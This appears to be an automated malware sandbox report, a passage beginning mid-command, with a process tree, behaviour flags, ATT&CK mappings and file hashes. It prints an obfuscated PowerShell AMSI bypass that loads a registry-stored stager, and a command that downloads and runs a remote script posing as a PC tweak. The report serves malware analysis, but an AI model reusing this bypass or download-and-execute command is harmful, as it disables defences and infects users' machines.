Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+',A'+'n'+''+'s'+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+'o'+''+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$mruFQuehGWB.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'de'+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$FFtUTnlGmJqauN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+','+'Ma'+'n'+''+[Char](97)+'ge'+[Char](100)+'');$mruFQuehGWB.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$tGcfIEGOpj,$FFtUTnlGmJqauN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $mruFQuehGWB.CreateType();}$DSUUkKlLhrBXt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'cro'+[Char](115)+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$VwgiibNDVOYwFv=$DSUUkKlLhrBXt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+'e'+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jTIjIEHYQUjgeApLTpL=VhHvpPjEINuB @([String])([IntPtr]);$eSMHrfaXqHvSgWeZlYTNkf=VhHvpPjEINuB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qsBaGPpLdzi=$DSUUkKlLhrBXt.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+'3'+'2.'+[Char](100)+''+[Char](108)+'l')));$udjCjUxFdhyogm=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$qsBaGPpLdzi,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$QtdkoMPmZmUWkfwSC=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$qsBaGPpLdzi,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+[Char](114)+'ot'+'e'+''+'c'+''+[Char](116)+'')));$UlCUYdf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($udjCjUxFdhyogm,$jTIjIEHYQUjgeApLTpL).Invoke('a'+'m'+'s'+'i'+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$RBbdyDBWoVyvGJQaI=$VwgiibNDVOYwFv.Invoke($Null,@([Object]$UlCUYdf,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$jmtryRnpAY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtdkoMPmZmUWkfwSC,$eSMHrfaXqHvSgWeZlYTNkf).Invoke($RBbdyDBWoVyvGJQaI,[uint32]8,4,[ref]$jmtryRnpAY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RBbdyDBWoVyvGJQaI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QtdkoMPmZmUWkfwSC,$eSMHrfaXqHvSgWeZlYTNkf).Invoke($RBbdyDBWoVyvGJQaI,[uint32]8,0x20,[ref]$jmtryRnpAY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+'R'+''+'E'+'').GetValue('x'+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1312

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:3024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1580

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x428
2⤵
PID:4316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1716

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1808

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1940

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2224

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2632

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3000

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3256

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3396

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\download (2).jpg"
2⤵
PID:1608

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/el3rabtweakpc/raw | iex"
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4244

C:\Users\Admin\AppData\Local\Temp\x4s.exe
"C:\Users\Admin\AppData\Local\Temp\x4s.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:808

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
5⤵
- Executes dropped EXE
PID:4896

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2508

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2140

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3452

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3744

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4736

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4376

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4404

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4920

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

4

T1082

Query Registry

3

T1012

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0iob1vnl.nia.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
Filesize
164KB

MD5
8a7bee2c8cec6ac50bc42fe03d3231e6

SHA1
ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d

SHA256
c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8

SHA512
34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4s.exe
Filesize
33KB

MD5
7d333fbc75b9264d3b631861794a7641

SHA1
165e2b6ad994fe9bab44154e3812b2e8825dfa76

SHA256
b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf

SHA512
54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3

Download Submit
C:\Windows\svchost32.exe
Filesize
180KB

MD5
de68372979221ee19e301cd657bdb1b6

SHA1
4266ce79f32422735a99259c27749b6d7fbe158e

SHA256
720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a

SHA512
3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize
338B

MD5
60fc2fb5809292139e692abaacbc9a75

SHA1
150f221a72a93b771f4588cd9b40de90f2c67336

SHA256
c326e6dc997a40e522db64330b5e7eb55bf8afc1f1bcb7cd947861bccb9b19c2

SHA512
195021991390e10523e606a31f277eecbb088e520401eedffb828a045314b80ee4f9212e6d512d0e0b884fa5029f28998adef06a8f12849b8f34629e2ce265cd

Download Submit
\Users\Admin\AppData\Local\Temp\tmp1023.tmp
Filesize
100KB

MD5
1b942faa8e8b1008a8c3c1004ba57349

SHA1
cd99977f6c1819b12b33240b784ca816dfe2cb91

SHA256
555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc

SHA512
5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43

Download Submit
memory/588-104-0x000002D300070000-0x000002D30009C000-memory.dmp

Filesize
176KB

Download
memory/588-105-0x000002D300070000-0x000002D30009C000-memory.dmp

Filesize
176KB

Download
memory/588-112-0x00007FF811160000-0x00007FF811170000-memory.dmp

Filesize
64KB

Download
memory/588-111-0x000002D300070000-0x000002D30009C000-memory.dmp

Filesize
176KB

Download
memory/588-103-0x000002D300040000-0x000002D300066000-memory.dmp

Filesize
152KB

Download
memory/644-122-0x0000026EE7940000-0x0000026EE796C000-memory.dmp

Filesize
176KB

Download
memory/644-116-0x0000026EE7940000-0x0000026EE796C000-memory.dmp

Filesize
176KB

Download
memory/644-123-0x00007FF811160000-0x00007FF811170000-memory.dmp

Filesize
64KB

Download
memory/744-127-0x000001F104590000-0x000001F1045BC000-memory.dmp

Filesize
176KB

Download
memory/744-133-0x000001F104590000-0x000001F1045BC000-memory.dmp

Filesize
176KB

Download
memory/744-134-0x00007FF811160000-0x00007FF811170000-memory.dmp

Filesize
64KB

Download
memory/808-788-0x000000001C4B0000-0x000000001C4BC000-memory.dmp

Filesize
48KB

Download
memory/808-783-0x000000001C060000-0x000000001C09A000-memory.dmp

Filesize
232KB

Download
memory/808-777-0x000000001BDE0000-0x000000001BDEE000-memory.dmp

Filesize
56KB

Download
memory/808-62-0x0000000000180000-0x000000000018E000-memory.dmp

Filesize
56KB

Download
memory/808-789-0x000000001C8C0000-0x000000001C94E000-memory.dmp

Filesize
568KB

Download
memory/808-812-0x000000001C9B0000-0x000000001C9BA000-memory.dmp

Filesize
40KB

Download
memory/808-813-0x000000001C1D0000-0x000000001C1E2000-memory.dmp

Filesize
72KB

Download
memory/808-831-0x000000001B260000-0x000000001B26C000-memory.dmp

Filesize
48KB

Download
memory/900-145-0x00007FF811160000-0x00007FF811170000-memory.dmp

Filesize
64KB

Download
memory/900-144-0x0000025C392D0000-0x0000025C392FC000-memory.dmp

Filesize
176KB

Download
memory/900-139-0x0000025C392D0000-0x0000025C392FC000-memory.dmp

Filesize
176KB

Download
memory/960-149-0x000001AF38330000-0x000001AF3835C000-memory.dmp

Filesize
176KB

Download
memory/2756-50-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

Filesize
9.9MB

Download
memory/2756-5-0x0000021E677F0000-0x0000021E67812000-memory.dmp

Filesize
136KB

Download
memory/2756-9-0x0000021E679A0000-0x0000021E67A16000-memory.dmp

Filesize
472KB

Download
memory/2756-8-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

Filesize
9.9MB

Download
memory/2756-3-0x00007FF834293000-0x00007FF834294000-memory.dmp

Filesize
4KB

Download
memory/2756-10-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

Filesize
9.9MB

Download
memory/2756-25-0x00007FF834290000-0x00007FF834C7C000-memory.dmp

Filesize
9.9MB

Download
memory/2756-30-0x0000021E68100000-0x0000021E682C2000-memory.dmp

Filesize
1.8MB

Download
memory/3820-86-0x000002CF2B2A0000-0x000002CF2B2CA000-memory.dmp

Filesize
168KB

Download
memory/3820-87-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp

Filesize
1.9MB

Download
memory/3820-88-0x00007FF850140000-0x00007FF8501EE000-memory.dmp

Filesize
696KB

Download
memory/4244-49-0x0000000000200000-0x0000000000234000-memory.dmp

Filesize
208KB

Download
memory/4276-100-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4276-92-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4276-89-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4276-90-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4276-91-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4276-98-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp

Filesize
1.9MB

Download
memory/4276-99-0x00007FF850140000-0x00007FF8501EE000-memory.dmp

Filesize
696KB

Download
memory/4276-97-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads